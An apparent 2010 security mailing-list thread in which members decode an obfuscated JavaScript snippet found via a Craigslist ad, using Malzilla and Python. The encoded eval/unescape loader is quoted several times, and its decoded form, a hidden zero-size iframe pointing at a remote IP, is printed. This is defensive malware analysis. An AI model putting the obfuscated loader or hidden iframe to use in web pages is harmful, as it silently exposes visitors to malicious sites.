Re: Decode this Javascript?

[Cezar Spatariu Neagu <cezar.spatariu () gmail com>]

the python way for the transformation would be.


> > > import array
> > > my_list =
[60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,50,48,49,46,50,51,53,46,50,51,53,46,49,55,52,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62]
> > > array.array('B', my_list).tostring()
'<iframe src="http://201.235.235.174/index.php"; width="0"
height="0"></iframe>'

Cezar


On Thu, Apr 8, 2010 at 1:59 AM, Nicholas B. <nberthaume () gmail com> wrote:

> I like using jsunpack for decodes myself... and looking over the
> recent submissions can give you some ideas of the depth at which some
> obfuscation goes to.  http://jsunpack.jeek.org/dec/go
>
> On Wed, Apr 7, 2010 at 11:05 AM, Rhonda Kreklau
> <rhonda.kreklau () gmail com> wrote:
> >  Thanks to all those that replied.
> >
> >  I googled malware analysis last night and ran the url through Anubis
> > and Wepawet. Anubis indicated some traffic, but I didn't see much else
> > on their report. While Wepawet was waiting to process, I had to leave
> > for class and rebooted my library PC. Google had not picked this up as
> > a malicious link at that point in time. I'll look into Malzilla next
> > time.
> >
> >  Thanks again all.
> >
> >  Regards,
> >
> >  Rhonda
> >
> > On Wed, Apr 7, 2010 at 6:48 AM, Chris Blazek <chris.blazek () gmail com>
> wrote:
> > > malzilla works wonders:
> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));
> > > 1st Pass:
> document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,50,48,49,46,50,51,53,46,50,51,53,46,49,55,52,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62));
> > > 2nd Pass:
> > > <iframe src="hxxp://201.235.235.174/index.php" width="0"
> > > height="0"></iframe>
> > >
> > > I wouldn't pull up the iframe src. I didn't delve into what it was
> actually
> > > doing but the IP is an Argentina cable provider.
> > >
> > >
> > >
> > >
> > > On Tue, Apr 6, 2010 at 9:11 PM, Rhonda Kreklau <
> rhonda.kreklau () gmail com>
> > > wrote:
> > > > I found this by following a Craigslist ad asking for redesign job on a
> > > > website...can someone decode it for me...
> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2C48%2C49%2C46%2C50%2C51%2C53%2C46%2C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));
> > > > Thanks
> > > >
> > > > Rhonda
> > > > _______________________________________________
> > > > Pauldotcom mailing list
> > > > Pauldotcom () mail pauldotcom com
> > > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > > > Main Web Site: http://pauldotcom.com
> > >
> > >
> > >
> > > --
> > > http://www.kingbin.net/
> > >
> > > _______________________________________________
> > > Pauldotcom mailing list
> > > Pauldotcom () mail pauldotcom com
> > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > > Main Web Site: http://pauldotcom.com
> > _______________________________________________
> > Pauldotcom mailing list
> > Pauldotcom () mail pauldotcom com
> > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> > Main Web Site: http://pauldotcom.com
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom () mail pauldotcom com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com